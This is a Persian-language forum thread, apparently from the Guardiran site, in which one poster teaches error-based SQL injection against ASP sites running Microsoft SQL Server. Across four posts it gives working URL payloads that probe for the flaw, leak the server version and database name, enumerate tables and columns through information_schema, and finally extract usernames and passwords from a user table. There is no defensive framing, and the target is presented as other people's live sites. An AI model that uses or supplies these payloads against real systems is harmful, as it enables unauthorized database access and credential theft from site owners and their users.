discord icon
سرور دیسکورد گاردایران

پست های پیشنهاد شده

با سلام من قصد دارم در این تاپیک با شما آموزش باگ sql injection در سایت ها asp رو بدم . 

سطح : متوسط

تفاوت mssqli و mysql 

 

Mssql توسط شرکت مایکروسافت درست شده و با قیمت بالایی فروخته می شود و امکانات بیشتری دارد و برای هاست های ویندوز هم هست . 

Mysql اپن سورس و رایگان است و برای لینوکس است و قابلیت اجرا بر روی ویندوز هم دارد .

------------------------------------------------------------------------------------------------------------------------

تست آسیب پذیری ‌: 

به ادرس سایت ‘a را اضافه کنید . 

به این صورت : 

Site.com/news.aspx?id=4’a

 

و با دریافت خطا یعنی سایت اسیب پذیر است .

------------------------------------------------------------------------------------------------------------------------

بیرون کشیدن اطلاعات اولیه :

روش اول : 

 

Site.com/news.aspx?id=4+and+1=(convert(int,x))

 

روش دوم : 

 

Site.com/news.aspx?id=4+or+1=(convert(int,x))

 

و به جای x می توانید این مقادیر  بزنید ‌:

user

db_name

@@servername

@@version

Host_@@version

Host_name

و....

 

------------------------------------------------------------------------------------------------------------------------

 

برای طولانی نشدن پست ادامه رو در پست های دیگر می گذارم فعلا با مقدمه آشنا بشوید  .

امیدوارم مورد تایید شما قرار گرفته باشه و پست خوبی رو گذاشته باشم . 

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

خب میریم سراغ مرحله ی بعدی یعنی بیرون کشیدن جداول (tables)

 

بیرون کشیدن تیبل ها (asp) : 

 

and 1=(select top 1 table_name from information_schema.tables)

 

مثال : 

Site.com/news.asp?id=5+and 1=(select top 1 table_name from information_schema.tables)

 

خروجی : sadra ( نام یک تیبل را نشان می دهد برای بیشتر باید محدود سازی کنید ‌)

 

محدود سازی تیبل ها (asp) و بدست اوردن تیبل های بعدی :

 

and 1=(select top 1 table_name from information_schema.tables where table_name not in (‘table 1’,’table 2’,’table 3’,’table 4’,’table 5’……’))

 

به جای تیبل ۱ تیبل ۲ و ... بیاید اولین نام تیبلی که بدست اوردید را بزنید و بعد نام دوم و نام سوم و تا آخر .

یعنی خروجی دستور اول مثلا شد : sadra

 

پس می شود به این صورت : 

Site.com/news.asp?id=5+ and 1=(select top 1 table_name from information_schema.tables where table_name not in (‘sadra’))

 

خروجی : ali ، نام تیبل دوم را به شما نشان می دهد

 و برای تیبل بعد :

 

Site.com/news.asp?id=5+ and 1=(select top 1 table_name from information_schema.tables where table_name not in (‘sadra’,’ali’))

 

خروجی : amir ، نام تیبل سوم 

و باز هم به همین صورت پیش می روید : 

 

 

Site.com/news.asp?id=5+ and 1=(select top 1 table_name from information_schema.tables where table_name not in (‘sadra’,’ali’,’amir’ ))

 

 

نکات مهم برای یادگیری بهتر : 

·      همینطور به همین صورت پیش می روید تا جایی که تیبل مهم را بدست بی آورید .

·      شما دارید می گوییید تیبلی را به من نمایش بده که نام آن در لیست من نیست (not in) .

·      تا جایی بروید تا دیگر چیزی به شما نمایش ندهد و آن موقع است که تمام تیبل ها را بیرون کشیدید .

-------------------

امید وارم از این آموزش راضی باشید و پست خوبی رو گذاشته باشم . 

در آموزش بعد می رویم سراغ بیرون کشیدن ستون ها . 

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

در این قسمت همانطور که گفتم قصد دارم آموزش بیرون کشیدن ستون ها رو در سایت های asp بدهم . 

 

بیرون کشیدن ستون های یک تیبل :‌

 

and 1=(select top 1 column_name from information_schema.columns where table_name=’table name mohem (

 

به جای تیبل نیم مهم نام تیبل مهم خود را بنویسید .  

 

و مثلا خروجی این است : ID و برای ستون بعد این کار را می کنید : 

 

and 1=(select top 1 column_name from information_schema.columns where table_name=’table name mohem and column_name not in (‘ID’))

 

 و مثل بیرون کشیدن تیبل دارید می گویید ستونی را به من نشان بده که در لیست نیست بعد مثلا زمانی که دستور بالا را زدید خروجی می شود : user

 

و برای ستون بعدی : 

 

and 1=(select top 1 column_name from information_schema.columns where table_name=’table name mohem and column_name not in (‘ID’,’user’))

 

باز برای ستون های بعدی هم به همین صورت پیش می روید . 

بیشر نکات مثل بیرون کشیدن تیبل ها هست .

-------------------

امید وارم از این آموزش راضی باشید و پست خوبی رو گذاشته باشم . 

در آموزش بعد می رویم سراغ بیرون کشیدن اطلاعات ستون ها (username و password) 

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

سلام خدمت دوستان عزیز در این  پست میریم سراغ بیرون کشیدن اطلاعات ستون ها (username و password

 

بیرون کشیدن اطلاعات ستون ها : 

 

+and+1=(select top 1 column name from table name )

 

به جای تیبل نیم نام تیبلی که می خواهید مثلا  __user و به جای ستون نیم نام ستون مورد نظر را بنویسید . 

 

مثال : 

 

Site.com/news.asp?id=9+and+1=(select top 1 username from __user)

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

برای ارسال دیدگاه یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید دیدگاهی ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در سایت ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری